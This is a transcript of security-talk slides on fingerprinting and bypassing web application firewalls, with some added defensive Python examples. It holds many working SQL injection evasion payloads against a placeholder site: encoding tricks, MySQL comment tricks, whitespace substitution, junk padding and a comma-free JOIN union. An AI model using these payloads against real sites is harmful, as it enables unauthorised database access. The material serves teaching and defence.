Waf bypassing Techniques

Post on 16-Jan-2017


Transcript of Waf bypassing Techniques

WAF Bypassing Techniques

Avinash Kumar Thapa, Senior Security Analyst in Network Intelligence India

Bug hunter on HackerOne. CTF author on Vulnhub.com. Some exploits and PoCs on Exploit-DB as well. Passionate about web application security and exploit writing.

Agenda
• Introduction to Web Application Firewalls
• Operation Modes
• Vendors
• Fingerprinting WAF
• Ways to Bypass WAFs
• Practical Cases for Bypassing
• Conclusion

Introduction to Web Application Firewalls

• Presents as an application-layer device.
• Monitors all HTTP/HTTPS/SOAP/XML-RPC web service traffic between clients and servers, based upon pre-defined signatures in a database.
• The basic goal of a WAF is to monitor and block content that violates a pre-defined policy. These pre-defined policies are patterns of user input that end up in a potential attack.
• Understands HTTP and HTTPS traffic better than any traditional firewall.

Types of Operation Modes

Negative Model

A negative security model recognizes attacks by relying on a database of expected attack signatures.

Example: do not allow, in any page, any argument value (user input) which matches potential XSS strings like <script>, </script>, String.fromCharCode, etc.

Pros:
● Less time to implement.

Cons:
● Less protection.

Positive Model

A positive security model enforces positive behaviour by learning the application logic and building a security policy of valid known requests as a user interacts with the application.

Example: on page news.jsp, the field id could only accept the characters [0-9], starting at number 0 and going up to 65535, using intval conditions on the page (accepts only integers).

Pros:
● Better performance (fewer rules).
● Fewer false positives.

Cons:
● Much more time to implement.
● Some vendors provide an "automatic learning mode"; it helps, but is far from perfect. In the end, you always need a skilled human to review the policies.

Mix Model

Combination of both positive and negative model.

Testing Environments
• Google Chrome
• Mozilla Firefox
• Internet Explorer
• Opera Browser

Products
• F5 BIG-IP WAF
• Sucuri
• ModSecurity
• Imperva Incapsula
• PHP-IDS (PHP Intrusion Detection System)
• Quick Defense
• AQTRONIX WebKnight (for IIS, based on ISAPI filters)
• Barracuda WAF

Fingerprinting WAF: the WAF adds a cookie to the HTTP communication. Example: Citrix NetScaler WAF (screenshot in the original slides).

Fingerprinting WAF: F5 BIG-IP ASM (cookie screenshot in the original slides).

Fingerprinting WAF On the basis of HTTP Response

Other WAFs may be detected by the type of HTTP response received when submitting a malicious request; the response varies from one WAF to another. Some of the common responses are 403, 406, 419, 500, 501, etc.

Fingerprinting WAF: response for F5 BIG-IP (screenshot in the original slides).

Fingerprinting WAF: request and response for the ModSecurity firewall (request and response screenshots in the original slides).

Fingerprinting WAF: response for the WebKnight firewall (raw response, and the response as rendered in the browser; screenshots in the original slides).

Automatic Fingerprinting WAF Using Nmap Scripts

nmap -p80 --script http-waf-detect <host>

Using WaFw00f.py

python wafw00f.py --url <URL>

Techniques to Bypass WAFs

• Bypassing WAF for SQL injection vulnerabilities
• Bypassing WAF for XSS issues
• Bypassing WAF for LFI and RFI vulnerabilities

General Techniques to Bypass WAF
• Null character injection
• Mixed case
• Inline comments
• Chunked requests
• Buffer overflow
• HTTP parameter pollution
• URL encoding
• Keyword splitting
• Replaced keywords
• Ignoring cookies
• Using data URIs
• Header injection

Bypassing WAF for SQL Injection Vulnerabilities

Example 1 (without WAF)

Request: https://abc.com/index.php?id=1'

Response: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6

Example 1 (with WAF)

Request: https://abc.com/index.php?id=1'

Response: HTTP/1.1 403 Forbidden
or HTTP/1.1 406 Not Acceptable
or HTTP/1.1 404 Not Found
or HTTP/1.1 500 Internal Server Error
or HTTP/1.1 400 Bad Request

Some recon on the WAF: came to know that ModSecurity is in action.

Request: https://abc.com/index.php?id=1"
Response: HTTP/1.1 200 OK

Request: https://abc.com/index.php?id=1%27
Response: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' ' at line 6

This technique is URL encoding.

Sometimes you need to use:
1) Double URL encoding: %2527 → %27 → '
2) Triple URL encoding: %252527 → %2527 → %27 → ' (this is a very rare case)
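The double and triple encodings above work against a filter that percent-decodes its input only once before matching. The following is an added example, not code from the original slides: it contrasts a single-pass check with one that decodes to a fixed point, and shows that the fixed-point check sees the quote in every encoding layer. The sample values and the round limit are constructed for the example; the limit is an assumption that keeps crafted input from spinning the loop.

```python
# Added example (not from the original slides): single-pass percent-decoding
# versus decoding to a fixed point before a signature check.
from __future__ import annotations

from urllib.parse import unquote

# Assumption: a small bound on decode rounds; real input rarely needs more than
# two or three layers, and the bound stops pathological input from looping.
MAX_DECODE_ROUNDS = 5


def decode_to_fixpoint(value: str, max_rounds: int = MAX_DECODE_ROUNDS) -> tuple[str, int]:
    """Percent-decode repeatedly until the string stops changing.

    Returns the fully decoded value and the number of rounds that changed it
    (0 means the input carried no percent-encoding at all).
    """
    current = value
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def contains_quote_single_pass(value: str) -> bool:
    """Naive check: decode exactly once, then look for a single quote."""
    return "'" in unquote(value)


def contains_quote_fixpoint(value: str) -> bool:
    """Hardened check: decode to a fixed point, then look for a single quote."""
    decoded, _ = decode_to_fixpoint(value)
    return "'" in decoded


# Constructed sample parameter values mirroring the encoding layers above.
SAMPLES = {
    "plain": "1'",
    "single": "1%27",
    "double": "1%2527",
    "triple": "1%252527",
}


def evaluate(samples: dict[str, str] = SAMPLES) -> dict[str, dict]:
    """Run both checks over every sample; shows which layers the naive check misses."""
    report = {}
    for name, raw in samples.items():
        decoded, rounds = decode_to_fixpoint(raw)
        report[name] = {
            "decoded": decoded,
            "rounds": rounds,
            "single_pass": contains_quote_single_pass(raw),
            "fixpoint": contains_quote_fixpoint(raw),
        }
    return report


if __name__ == "__main__":
    for name, result in evaluate().items():
        print(f"{name:7s} {result}")
```

The practical caveat is that the filter must decode at least as many times as the application behind it will; a WAF that stops at one round while the application decodes again is exactly the gap the double-encoded request exploits.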

Request: https://abc.com/index.php?id=1%27 ORDER BY 1%23
Response: HTTP/1.1 403 Forbidden

Assumptions in mind:
• 'ORDER' keyword is blocked?
• 'ORDER BY' keyword is blocked?
• Any other alternative to the ORDER BY query?
• Are spaces blocked?

Let's try:

Request: https://abc.com/index.php?id=1%27 ORDER %23
Response: HTTP/1.1 403 Forbidden

Assumptions in mind:
• 'ORDER' keyword is blocked
• Check again: is 'ORDER' blocked?

Request: https://abc.com/index.php?id=1%27ORDER%23
Response: HTTP/1.1 200 OK

New assumptions in mind:
• 'ORDER' keyword is not blocked
• What is blocked then?

SPACES ARE BLOCKED

Request: https://abc.com/index.php?id=1%27 ORDER by 1 %23
Response: HTTP/1.1 403 Forbidden

Request: https://abc.com/index.php?id=1%27ORDERby1 %23
Response: HTTP/1.1 200 OK

No assumptions in mind, because only spaces are blocked.

Techniques to bypass spaces

Using '+' instead of a space, like order+by+1 (mostly blocked).

Using inline comments '/**/' instead of spaces, like order/**/by/**/1.

Using a combination of inline comments and URL encoding instead of spaces, like:
• Order/%2a%2a/by/%2a%2a/1
• Order%2f**%2fby%2f**%2f1

Using a combination of inline comments, URL encoding and junk characters instead of spaces, like:
• Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
• Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1

Techniques to bypass spaces

Using white space characters %0a, %0b, %0c, %0d, %a0, %09, %01. The query will be:
• ORDER%0aby%0a1
• ORDER%0bby%0b1
• ORDER%0cby%0c1
• ORDER%0Dby%0D1
• ORDER%A0by%A01
• ORDER%0D%0Aby%0D%0A1

Request: https://abc.com/index.php?id=1%27/**/ORDER/**/by/**/1%23
Response: HTTP/1.1 200 OK

Let's suppose the number of columns is 3.

Request: https://abc.com/index.php?id=1%27 UNION SELECT 1,2,3%23
Response: HTTP/1.1 403 Forbidden

Assumptions in mind:
• Spaces are blocked?

Request: https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/1,2,3%23
Response: HTTP/1.1 403 Forbidden

Assumptions in mind:
• Spaces were bypassed using inline comments... still blocked?
• 'UNION' keyword is blocked?
• 'SELECT' keyword is blocked?
• Integers are blocked?
• Commas are blocked?
• Combination of "UNION SELECT" is blocked?
• "SELECT with integers" is blocked?

Techniques to Bypass

If UNION is blocked:

Using inline (MySQL versioned) comments: /*!50000UNION*/ /*!40000UNION*/ /*!00000UNION*/

Using URL encoding techniques for UNION:
• URL encoding: %55nion
• Double URL encoding: %2555nion
• Encoding every character: %55%4e%49%4f%4e
• Triple URL encoding

Request: https://abc.com/index.php?id=1%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
Request: https://abc.com/index.php?id=1%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23
Request: https://abc.com/index.php?id=1%27/**//*!%55NION*//**/SELECT/**/1,2,3%23
Request: https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23
Response: HTTP/1.1 403 Forbidden

Assumptions in mind:
• 'UNION' keyword is blocked?
• 'SELECT' keyword is blocked?
• Integers are blocked?
• Commas are blocked?
• Combination of "UNION SELECT" is blocked?
• "SELECT with integers" is blocked?

Request: https://abc.com/index.php?id=1%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23
Request: https://abc.com/index.php?id=1%27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23
Request: https://abc.com/index.php?id=1%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23
Request: https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23
Response: HTTP/1.1 403 Forbidden

Assumptions in mind (unchanged):
• 'UNION' keyword is blocked?
• 'SELECT' keyword is blocked?
• Integers are blocked?
• Commas are blocked?
• Combination of "UNION SELECT" is blocked?
• "SELECT with integers" is blocked?

Request: https://abc.com/index.php?id=1%27/**//*!50000UNION*/1,2,3%23
Response: HTTP/1.1 200 OK

Request: https://abc.com/index.php?id=1%27/**//*!50000SELECT*/1,2,3%23
Response: HTTP/1.1 200 OK

Assumptions in mind:
• 'UNION' keyword is NOT blocked.
• 'SELECT' keyword is NOT blocked.
• Integers are NOT blocked.
• Commas are NOT blocked.
• Combination of "UNION SELECT" is blocked?
• "SELECT with integers" is NOT blocked.

Techniques to bypass the combination of "UNION SELECT"

Using a combination of inline comments and URL encoding:
• /*!50000%55niOn*/ /*!50000%53eLECT*/

Using white space characters and URL encoding of the comment character (#):
• Union%23%0aSELECT
• Union%23%0bSELECT
• Union%23%0cSELECT
• Union%23%0DSELECT
• Union%23%A0SELECT

Techniques to bypass the combination of "UNION SELECT"

Using "buffer overflow" (in this context, padding the request beyond the length the WAF inspects; it is not a memory-corruption overflow):

UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT

Sometimes the amount of junk needs to be increased as required:

UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT

Techniques to bypass the combination of "UNION SELECT"

Using the DISTINCT statement: UNION DISTINCT SELECT

Using the DISTINCTROW statement: UNION DISTINCTROW SELECT

https://abc.com/index.php?id=1%27/**/UNION

%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT/**/1,2,3%23

HTTP/1.1 200 OK
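Every "UNION SELECT" variant on the preceding slides (inline comments, MySQL versioned comments, '#' comments followed by a white space character, the padded "buffer overflow" form, and DISTINCT/DISTINCTROW) only evades a signature that matches the raw bytes. The following is an added example, not code from the original slides: a normalisation pass that collapses those variants to the statement the database actually executes, followed by one keyword check over the normalised text. It assumes the input has already been percent-decoded, and all sample payloads are constructed for the example.

```python
# Added example (not from the original slides): normalise the comment,
# whitespace and case tricks from the slides before matching "UNION SELECT".
# Input is assumed to be percent-decoded already.
import re

# MySQL "versioned" comments /*!50000 body */: the server executes the body,
# so keep the body and drop only the comment delimiters.
_VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
# Ordinary block comments are ignored by the server, so they behave as whitespace.
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# A '#' comment runs to the end of the line; the line break itself survives,
# which is what makes the UNION%23junk%0ASELECT form work against the server.
_HASH_COMMENT = re.compile(r"#[^\n]*")
# Control characters, space and NBSP cover the %0a/%0b/%0c/%0d/%09/%01/%a0 variants.
_WHITESPACE = re.compile(r"[\x00-\x20\x7f\xa0]+")

# UNION, optionally ALL / DISTINCT / DISTINCTROW, then SELECT as a whole word.
_UNION_SELECT = re.compile(r"\bUNION\s+(?:(?:ALL|DISTINCT|DISTINCTROW)\s+)?SELECT\b")


def normalize_sql_fragment(value: str) -> str:
    """Reduce a decoded parameter value to the token stream MySQL would see."""
    text = _VERSIONED_COMMENT.sub(r" \1 ", value)  # must run before block comments
    text = _BLOCK_COMMENT.sub(" ", text)
    text = _HASH_COMMENT.sub(" ", text)
    text = _WHITESPACE.sub(" ", text)
    return text.strip().upper()


def looks_like_union_select(value: str) -> bool:
    """True when the normalised value contains a UNION ... SELECT clause."""
    return _UNION_SELECT.search(normalize_sql_fragment(value)) is not None


# Constructed samples: decoded forms of the slides' payloads plus benign input.
SAMPLES = {
    "inline_comments": "1'/**/UNION/**/SELECT/**/1,2,3#",
    "versioned_comments": "1'/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3#",
    "versioned_mixed_case": "1'/**//*!UNIoN*//**//*!SELeCT*//**/1,2,3#",
    "hash_newline": "1' UNION#\nSELECT 1,2,3#",
    "padded": "1'/**/UNION#" + "X" * 2000 + "\nSELECT/**/1,2,3#",
    "distinctrow_nbsp": "1'\xa0UNION\xa0DISTINCTROW\xa0SELECT\xa01,2,3#",
    "benign_number": "1",
    "benign_prose": "the trade union selected a leader",
}


def evaluate(samples: dict = SAMPLES) -> dict:
    """Run the check over every sample; returns name -> flagged."""
    return {name: looks_like_union_select(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:22s} flagged={looks_like_union_select(raw)!s:5s} "
              f"normalised={normalize_sql_fragment(raw)[:40]!r}")
```

The order of the substitutions matters: versioned comments are unwrapped before plain block comments are removed, otherwise the plain-comment pattern would swallow the keyword inside /*!50000UNION*/. The padded sample shows that, because normalisation is applied to the whole value, the junk length is irrelevant once the '#' comment is handled correctly; the inspection-length limit that the padding trick relies on is a separate configuration matter.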

Special case: what if commas get blocked?

Request: https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/1,2,3%23
Response: HTTP/1.1 403 Forbidden

Assumptions in mind:
• 'UNION' keyword is NOT blocked.
• 'SELECT' keyword is NOT blocked.
• Integers are NOT blocked.
• Commas are blocked.
• Combination of "UNION SELECT" is NOT blocked?
• "SELECT with integers" is NOT blocked.

Time to bypass commas ",".

Basic bypasses:
• URL encoding: %2c
• Double URL encoding: %252c → %2c → ,
• Using inline comments /*!*/, like UNION SELECT 1/*!,*/2

Advanced way to bypass commas: using JOIN

JOIN is used for columns as UNION is used for rows.

We have SELECT 1,2,3; the same three columns without commas:

SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

Request: https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23
Response: HTTP/1.1 200 OK
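The JOIN form above reaches the database only because the id parameter is concatenated into the query text. The following is an added example, not code from the original slides: the slides' comma-free payload run against a string-concatenated query and against a parameterised one. It uses an in-memory SQLite database as a stand-in for the slides' MySQL backend (an assumption), and because SQLite ends a line comment with '--' rather than MySQL's '#', the payload's trailing comment is written as '-- ' here. The table and its rows are constructed for the example.

```python
# Added example (not from the original slides): the same payload against a
# concatenated query and against a bound parameter. SQLite stands in for MySQL.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed two-row table; id has INTEGER affinity like the slides' numeric id."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(1, "first"), (2, "second")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """Vulnerable: the user-controlled value becomes part of the SQL text."""
    sql = "SELECT id, title FROM news WHERE id = '" + id_param + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn: sqlite3.Connection, id_param: str) -> list:
    """Hardened: the value is bound as data; comments and keywords in it are inert."""
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (id_param,)).fetchall()


# Decoded form of the slide's comma-free payload, with SQLite's '--' line comment
# in place of MySQL's '#'. (Constructed for this example.)
PAYLOAD = "1'/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b-- "


def demo() -> dict:
    """Run both lookups with the payload and a benign id; returns the row sets."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),      # real row plus the injected (1, 2)
        "parameterised": lookup_parameterised(conn, PAYLOAD),  # no row has that literal id
        "benign": lookup_parameterised(conn, "1"),            # normal lookup still works
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:14s} {rows}")
```

The vulnerable lookup returns the genuine row and the injected (1, 2) row, which is the signal the slides read as "HTTP/1.1 200 OK"; the parameterised lookup returns nothing for the payload and the correct row for a benign id. No WAF rule is involved in the second case, which is the point: the WAF is a filter in front of the flaw, and binding parameters removes the flaw itself.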

Similar approach for other vulnerabilities: XSS, and LFI/RFI.

DEMO TIME

References

Images in slides 10, 11, 14, 15, 16 and 17 are taken from:
http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf

Thank you..!